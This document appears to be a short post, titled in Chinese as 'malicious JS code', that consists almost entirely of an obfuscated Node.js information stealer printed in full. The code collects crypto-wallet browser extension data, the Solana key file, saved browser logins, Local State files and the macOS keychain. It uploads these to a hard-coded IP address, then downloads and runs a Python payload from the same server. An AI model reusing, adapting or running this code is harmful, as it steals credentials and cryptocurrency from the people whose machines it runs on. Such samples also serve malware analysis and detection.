恶意js代码

1. mailto:[email protected] _0x153e97 = require('fs');
2. const _0x5801ce = require('os');
3. const _0x2b28c9 = require('path');
4. const _0x50d163 = require('request');
5. const _0x4a3b2c = require('child_process').exec;
6. const _0x39c622 = _0x5801ce.hostname();
7. const _0x2ae0c6 = _0x5801ce.platform();
8. const _0x349174 = _0x5801ce.homedir();
9. const _0x414643 = _0x5801ce.tmpdir();
10. const _0x55065c = 'http://95.164.17.24:1224';
11. const _0x518ab7 = _0x512eda => _0x512eda.replace(/^~([a-z]+|\/)/, (_0x543a39, _0x13c8d2) => '/' === _0x13c8d2 ? _0x349174 : _0x2b28c9.dirname(_0x349174) + '/' + _0x13c8d2);
12. const _0x4d7739 = '10';
13. const _0x4dfc56 = '106';
14. function _0x1142d3(_0x26632e) {
15. try {
16. _0x153e97.accessSync(_0x26632e);
17. return true;
18. } catch (_0x21f158) {
19. return false;
20. }
21. }
22. const _0x1232d9 = [
23. 'Local/BraveSoftware/Brave-Browser',
24. 'BraveSoftware/Brave-Browser',
25. 'BraveSoftware/Brave-Browser'
26. ];
27. const _0x151d96 = [
28. 'Local/Google/Chrome',
29. 'Google/Chrome',
30. 'google-chrome'
31. ];
32. const _0x1c1cc8 = [
33. 'Roaming/Opera Software/Opera Stable',
34. 'com.operasoftware.Opera',
35. 'opera'
36. ];
37. const _0x275436 = [
38. 'nkbihfbeogaeaoehlefnkodbefgpgknn',
39. 'ejbalbakoplchlghecdalmeeeajnimhm',
40. 'fhbohimaelbohpjbbldcngcnapndodjp',
41. 'hnfanknocfeofbddgcijnmhnfnkdnaad',
42. 'ibnejdfjmmkpcnlpebklmnkoeoihofec',
43. 'bfnaelmomeimhlpmgjnjophhpkkoljpa',
44. 'aeachknmefphepccionboohckonoeemg',
45. 'hifafgmccdpekplomjjkcfgodnhcellj',
46. 'jblndlipeogpafnldhgmapagcccfchpi',
47. 'acmacodkjbdgmoleebolmdjonilkdbch',
48. 'dlcobpjiigpikoobohmabehhmhfoodbb',
49. 'aholpfdialjgjfhomihkjbmgjidlcdno'
50. ];
51. const _0x179256 = async (_0x420236, _0x3d29b1, _0x5b6a41, _0x461e07) => {
52. let _0x496d98;
53. if (!_0x420236 || '' === _0x420236)
54. return [];
55. try {
56. if (!_0x1142d3(_0x420236))
57. return [];
58. } catch (_0x1f024e) {
59. return [];
60. }
61. _0x3d29b1 || (_0x3d29b1 = '');
62. let _0x55e519 = [];
63. for (let _0x4293f0 = 0; _0x4293f0 < 200; _0x4293f0++) {
64. const _0x50fbe9 = _0x420236 + '/' + (0 === _0x4293f0 ? 'Default' : 'Profile ' + _0x4293f0) + '/Local Extension Settings';
65. for (let _0x38faa0 = 0; _0x38faa0 < _0x275436.length; _0x38faa0++) {
66. let _0x4a10a4 = _0x50fbe9 + '/' + _0x275436[_0x38faa0];
67. if (_0x1142d3(_0x4a10a4)) {
68. let _0x134608 = [];
69. try {
70. _0x134608 = _0x153e97.readdirSync(_0x4a10a4);
71. } catch (_0x36e276) {
72. _0x134608 = [];
73. }
74. _0x134608.forEach(async _0x560152 => {
75. let _0x19df4a = _0x2b28c9.join(_0x4a10a4, _0x560152);
76. try {
77. _0x358540.filename = _0x4dfc56 + '_' + _0x3d29b1 + _0x4293f0 + '_' + _0x275436[_0x38faa0] + '_' + _0x560152;
78. if (_0x19df4a.includes('.log') || _0x19df4a.includes('.ldb')) {
79. _0x55e519.push({
80. 'value': _0x153e97.createReadStream(_0x19df4a),
81. 'options': _0x358540
82. });
83. }
84. } catch (_0x2fafd8) {
85. }
86. });
87. }
88. }
89. }
90. if (_0x5b6a41 && (_0x496d98 = _0x349174 + '/.config/solana/id.json', _0x153e97.existsSync(_0x496d98)))
91. try {
92. _0x2c5125.filename = 'solana_id.txt';
93. _0x55e519.push({
94. 'value': _0x153e97.createReadStream(_0x496d98),
95. 'options': _0x2c5125
96. });
97. } catch (_0x3264a7) {
98. }
99. _0x4c9bba(_0x55e519, _0x461e07);
100. return _0x55e519;
101. };
102. const _0x480bd5 = _0x4deb16 => {
103. const _0x5d34b1 = _0x518ab7('~/') + '/AppData/Roaming/Mozilla/Firefox/Profiles';
104. let _0x111c72 = [];
105. if (_0x1142d3(_0x5d34b1)) {
106. let _0x3625f7 = [];
107. try {
108. _0x3625f7 = _0x153e97.readdirSync(_0x5d34b1);
109. } catch (_0x1f1115) {
110. _0x3625f7 = [];
111. }
112. let _0x7759d8 = 0;
113. _0x3625f7.forEach(async _0x2842d3 => {
114. _0x48dfb2.RMbiC = 'moz-extension';
115. let _0x30ef48 = _0x2b28c9.join(_0x5d34b1, _0x2842d3);
116. if (_0x30ef48.includes('-release')) {
117. let _0x30b510 = _0x2b28c9.join(_0x30ef48, '/storage/default');
118. let _0x4982d2 = [];
119. _0x4982d2 = _0x153e97.readdirSync(_0x30b510);
120. let _0x5a0203 = 0;
121. _0x4982d2.forEach(async _0x56daf8 => {
122. if (_0x56daf8.includes(_0x48dfb2.RMbiC)) {
123. let _0x306740 = _0x2b28c9.join(_0x30b510, _0x56daf8);
124. _0x306740 = _0x2b28c9.join(_0x306740, 'idb');
125. let _0x43ad12 = [];
126. _0x43ad12 = _0x153e97.readdirSync(_0x306740);
127. _0x43ad12.forEach(async _0x55d331 => {
128. _0x44a64c.ZoevY = 'saaKV';
129. const _0x12e040 = _0x44a64c;
130. if (_0x55d331.includes('.files')) {
131. let _0x514edb = _0x2b28c9.join(_0x306740, _0x55d331);
132. let _0x258864 = [];
133. _0x258864 = _0x153e97.readdirSync(_0x514edb), _0x258864.forEach(_0x263353 => {
134. if (!_0x153e97.statSync(_0x2b28c9.join(_0x514edb, _0x263353)).isDirectory()) {
135. if ('saaKV' === _0x12e040.ZoevY) {
136. let _0xe8f438 = _0x2b28c9.join(_0x514edb, _0x263353);
137. _0x1033f6.filename = _0x7759d8 + '_' + _0x5a0203 + '_' + _0x263353, _0x111c72.push({
138. 'value': _0x153e97.createReadStream(_0xe8f438),
139. 'options': _0x1033f6
140. });
141. } else {
142. if (_0x110b8c)
143. return _0x3ae25b = 0, void _0x17f182();
144. try {
145. _0x1e5442 = _0x30ebe7 + 6, _0x1b9e6f.renameSync(_0x11302a, _0x16c5f9), _0x18d5fe(_0x58f816);
146. } catch (_0x419fb3) {
147. }
148. }
149. }
150. });
151. }
152. });
153. }
154. });
155. _0x5a0203 += 1;
156. }
157. _0x7759d8 += 1;
158. });
159. _0x4c9bba(_0x111c72, _0x4deb16);
160. return _0x111c72;
161. }
162. };
163. const _0x4c9bba = (_0xe07451, _0x1b7ff1) => {
164. _0x43625c.htTaB = function (_0x3365ee, _0x2824ae) {
165. return _0x3365ee > _0x2824ae;
166. };
167. _0x20b054.type = _0x4d7739;
168. _0x20b054.hid = _0x4dfc56 + '_' + _0x39c622;
169. _0x20b054.uts = _0x1b7ff1;
170. _0x20b054.multi_file = _0xe07451;
171. try {
172. if (_0x43625c.htTaB(_0xe07451.length, 0)) {
173. _0x4fdebb.url = _0x55065c + '/uploads';
174. _0x4fdebb.formData = _0x20b054;
175. const _0x3df7d2 = _0x4fdebb;
176. _0x50d163.post(_0x3df7d2, (_0x205d4e, _0x511e72, _0x522bc2) => {
177. });
178. }
179. } catch (_0x5584a2) {
180. }
181. };
182. const _0x113bb7 = async (_0x3d22ed, _0x1b631f, _0x1d5db2) => {
183. try {
184. let _0x578130 = '';
185. _0x578130 = 'd' == _0x2ae0c6[0] ? _0x518ab7('~/') + '/Library/Application Support/' + _0x3d22ed[1] : 'l' == _0x2ae0c6[0] ? _0x518ab7('~/') + '/.config/' + _0x3d22ed[2] : _0x518ab7('~/') + '/AppData/' + _0x3d22ed[0] + '/User Data';
186. await _0x179256(_0x578130, _0x1b631f + '_', 0 == _0x1b631f, _0x1d5db2);
187. } catch (_0x10dda6) {
188. }
189. };
190. const _0xa29cb7 = async _0x4cc40b => {
191. let _0x2a6d0c = [];
192. let _0x499aff = _0x349174 + '/Library/Keychains/login.keychain';
193. if (_0x153e97.existsSync(_0x499aff))
194. try {
195. _0x52fec3.filename = 'logkc-db';
196. _0x2a6d0c.push({
197. 'value': _0x153e97.createReadStream(_0x499aff),
198. 'options': _0x52fec3
199. });
200. } catch (_0x620dce) {
201. }
202. else {
203. if (_0x499aff += '-db', _0x153e97.existsSync(_0x499aff)) {
204. try {
205. _0x4de460.filename = 'logkc-db';
206. _0x2a6d0c.push({
207. 'value': _0x153e97.createReadStream(_0x499aff),
208. 'options': _0x4de460
209. });
210. } catch (_0x1b6066) {
211. }
212. }
213. }
214. try {
215. let _0x1933fe = _0x349174 + '/Library/Application Support/Google/Chrome';
216. if (_0x1142d3(_0x1933fe))
217. for (let _0x2285ca = 0; _0x2285ca < 200; _0x2285ca++) {
218. const _0x2c66c8 = _0x1933fe + '/' + (0 === _0x2285ca ? 'Default' : 'Profile ' + _0x2285ca) + '/Login Data';
219. try {
220. if (!_0x1142d3(_0x2c66c8))
221. continue;
222. const _0x221499 = _0x1933fe + '/ld_' + _0x2285ca;
223. _0x3e3e04.filename = 'pld_' + _0x2285ca;
224. _0x1142d3(_0x221499) ? _0x2a6d0c.push({
225. 'value': _0x153e97.createReadStream(_0x221499),
226. 'options': _0x3e3e04
227. }) : _0x153e97.copyFile(_0x2c66c8, _0x221499, _0x111530 => {
228. _0x382108.filename = 'pld_' + _0x2285ca;
229. _0x4c9bba(_0x17eed3, _0x4cc40b);
230. });
231. } catch (_0x3bd59c) {
232. }
233. }
234. } catch (_0x5aa8b3) {
235. }
236. try {
237. let _0xa0d771 = _0x349174 + '/Library/Application Support/BraveSoftware/Brave-Browser';
238. if (_0x1142d3(_0xa0d771)) {
239. for (let _0x108329 = 0; _0x108329 < 200; _0x108329++) {
240. const _0x73412e = _0xa0d771 + '/' + (0 === _0x108329 ? 'Default' : 'Profile ' + _0x108329);
241. try {
242. if (!_0x1142d3(_0x73412e))
243. continue;
244. const _0x3f0e2e = _0x73412e + '/Login Data';
245. _0x1a69a2.filename = 'brld_' + _0x108329;
246. _0x1142d3(_0x3f0e2e) ? _0x2a6d0c.push({
247. 'value': _0x153e97.createReadStream(_0x3f0e2e),
248. 'options': _0x1a69a2
249. }) : _0x153e97.copyFile(_0x73412e, _0x3f0e2e, _0x1bb611 => {
250. _0x5e8ee6.filename = 'brld_' + _0x108329;
251. _0x4c9bba(_0x24b358, _0x4cc40b);
252. });
253. } catch (_0x33069e) {
254. }
255. }
256. }
257. } catch (_0x51b57d) {
258. }
259. _0x4c9bba(_0x2a6d0c, _0x4cc40b);
260. return _0x2a6d0c;
261. };
262. const _0x4cd284 = async (_0x337ef1, _0x30fbea, _0x321c3a) => {
263. _0x29de3e.akeQX = function (_0x58454e, _0x174488) {
264. return _0x58454e == _0x174488;
265. };
266. _0x29de3e.oeCDM = 'Default';
267. const _0x46eb64 = _0x29de3e;
268. let _0x4abead = [];
269. let _0x52f98e = '';
270. _0x52f98e = _0x46eb64.akeQX('d', _0x2ae0c6[0]) ? _0x518ab7('~/') + '/Library/Application Support/' + _0x337ef1[1] : _0x46eb64.akeQX('l', _0x2ae0c6[0]) ? _0x518ab7('~/') + '/.config/' + _0x337ef1[2] : _0x518ab7('~/') + '/AppData/' + _0x337ef1[0] + '/User Data';
271. let _0x5a6a6a = _0x52f98e + '/Local State';
272. if (_0x153e97.existsSync(_0x5a6a6a))
273. try {
274. _0x540d33.filename = _0x30fbea + '_lst';
275. _0x4abead.push({
276. 'value': _0x153e97.createReadStream(_0x5a6a6a),
277. 'options': _0x540d33
278. });
279. } catch (_0x38f090) {
280. }
281. try {
282. if (_0x1142d3(_0x52f98e))
283. for (let _0x40ae5d = 0; _0x40ae5d < 200; _0x40ae5d++) {
284. const _0x1b4ce1 = _0x52f98e + '/' + (0 === _0x40ae5d ? _0x46eb64.oeCDM : 'Profile ' + _0x40ae5d);
285. try {
286. if (!_0x1142d3(_0x1b4ce1))
287. continue;
288. const _0x41a087 = _0x1b4ce1 + '/Login Data';
289. if (!_0x1142d3(_0x41a087))
290. continue;
291. _0x4d3b6e.filename = _0x30fbea + '_' + _0x40ae5d + '_uld';
292. _0x4abead.push({
293. 'value': _0x153e97.createReadStream(_0x41a087),
294. 'options': _0x4d3b6e
295. });
296. } catch (_0x521dea) {
297. }
298. }
299. } catch (_0x4dff51) {
300. }
301. _0x4c9bba(_0x4abead, _0x321c3a);
302. return _0x4abead;
303. };
304. const _0x83c819 = 51476590;
305. let _0x30d7dc = 0;
306. const _0x3ea08d = async _0x2f9695 => {
307. _0x4a3b2c('tar -xf ' + _0x2f9695 + ' -C ' + _0x349174, (_0x169a09, _0x301f3c, _0x43b713) => {
308. if (_0x169a09) {
309. _0x153e97.rmSync(_0x2f9695);
310. return void (_0x30d7dc = 0);
311. }
312. _0x153e97.rmSync(_0x2f9695);
313. _0x24997f();
314. });
315. };
316. const _0x1a2cec = () => {
317. _0x33cf5b.dwcpv = function (_0x543095, _0x196bba) {
318. return _0x543095 + _0x196bba;
319. };
320. _0x33cf5b.hhADP = function (_0x4aeb76, _0x2bbd11) {
321. return _0x4aeb76 >= _0x2bbd11;
322. };
323. const _0x12f865 = _0x33cf5b;
324. const _0x14524e = _0x55065c + '/pdown';
325. const _0x5765fd = _0x414643 + '\\p.zi';
326. const _0x1c020d = _0x414643 + '\\p2.zip';
327. if (_0x30d7dc >= _0x12f865.dwcpv(_0x83c819, 6))
328. return;
329. if (_0x153e97.existsSync(_0x5765fd))
330. try {
331. var _0x382278 = _0x153e97.statSync(_0x5765fd);
332. _0x12f865.hhADP(_0x382278.size, _0x83c819 + 6) ? (_0x30d7dc = _0x382278.size, _0x153e97.rename(_0x5765fd, _0x1c020d, _0x542bf8 => {
333. if (_0x542bf8)
334. throw _0x542bf8;
335. _0x3ea08d(_0x1c020d);
336. })) : (_0x30d7dc < _0x382278.size ? _0x30d7dc = _0x382278.size : (_0x153e97.rmSync(_0x5765fd), _0x30d7dc = 0), _0x1c1ddd());
337. } catch (_0x441510) {
338. }
339. else
340. _0x4a3b2c('curl -Lo "' + _0x5765fd + '" "' + _0x14524e + '"', (_0x245de9, _0x5e0ce1, _0x208b7c) => {
341. if (_0x245de9) {
342. _0x30d7dc = 0;
343. return void _0x1c1ddd();
344. }
345. try {
346. _0x30d7dc = _0x83c819 + 6;
347. _0x153e97.renameSync(_0x5765fd, _0x1c020d);
348. _0x3ea08d(_0x1c020d);
349. } catch (_0x5eaf99) {
350. }
351. });
352. };
353. function _0x1c1ddd() {
354. setTimeout(() => {
355. _0x1a2cec();
356. }, 20000);
357. }
358. const _0x24997f = async () => await new Promise((_0x49da6c, _0xb70373) => {
359. if ('w' == _0x2ae0c6[0])
360. _0x153e97.existsSync(_0x349174 + '\\.pyp\\python.exe') ? (() => {
361. const _0x4fa76f = _0x55065c + '/client/' + _0x4d7739 + '/' + _0x4dfc56;
362. const _0x3f680a = _0x349174 + '/.npl';
363. const _0x37ec0f = '"' + _0x349174 + '\\.pyp\\python.exe" "' + _0x3f680a + '"';
364. try {
365. _0x153e97.rmSync(_0x3f680a);
366. } catch (_0x3c30f7) {
367. }
368. _0x50d163.get(_0x4fa76f, (_0x176bab, _0x343331, _0xe2c939) => {
369. if (!_0x176bab)
370. try {
371. _0x153e97.writeFileSync(_0x3f680a, _0xe2c939);
372. _0x4a3b2c(_0x37ec0f, (_0x33a2cd, _0x4850e3, _0x147978) => {
373. });
374. } catch (_0x2fea4e) {
375. }
376. });
377. })() : _0x1a2cec();
378. else
379. (() => {
380. _0x50d163.get(_0x55065c + '/client/' + _0x4d7739 + '/' + _0x4dfc56, (_0x336f68, _0x385264, _0x53682d) => {
381. _0x336f68 || (_0x153e97.writeFileSync(_0x349174 + '/.npl', _0x53682d), _0x4a3b2c('python3 "' + _0x349174 + '/.npl"', (_0x7c798f, _0x4027e7, _0x537b65) => {
382. }));
383. });
384. })();
385. });
386. var _0x2cf641 = 0;
387. const _0x285d2b = async () => {
388. try {
389. const _0x200277 = Math.round(new Date().getTime() / 1000);
390. await (async () => {
391. try {
392. await _0x113bb7(_0x151d96, 0, _0x200277);
393. await _0x113bb7(_0x1232d9, 1, _0x200277);
394. await _0x113bb7(_0x1c1cc8, 2, _0x200277);
395. _0x480bd5(_0x200277);
396. if ('w' == _0x2ae0c6[0]) {
397. await _0x179256(_0x518ab7('~/') + '/AppData/Local/Microsoft/Edge/User Data', '3_', false, _0x200277);
398. }
399. 'd' == _0x2ae0c6[0] ? await _0xa29cb7(_0x200277) : (await _0x4cd284(_0x151d96, 0, _0x200277), await _0x4cd284(_0x1232d9, 1, _0x200277), await _0x4cd284(_0x1c1cc8, 2, _0x200277));
400. } catch (_0x11074c) {
401. }
402. })();
403. _0x24997f();
404. } catch (_0x153a9a) {
405. }
406. };
407. _0x285d2b();
408. _0x24997f();
409. let _0x5d4cfa = setInterval(() => {
410. (_0x2cf641 += 1) < 2 ? _0x285d2b() : clearInterval(_0x5d4cfa);
411. }, 90000);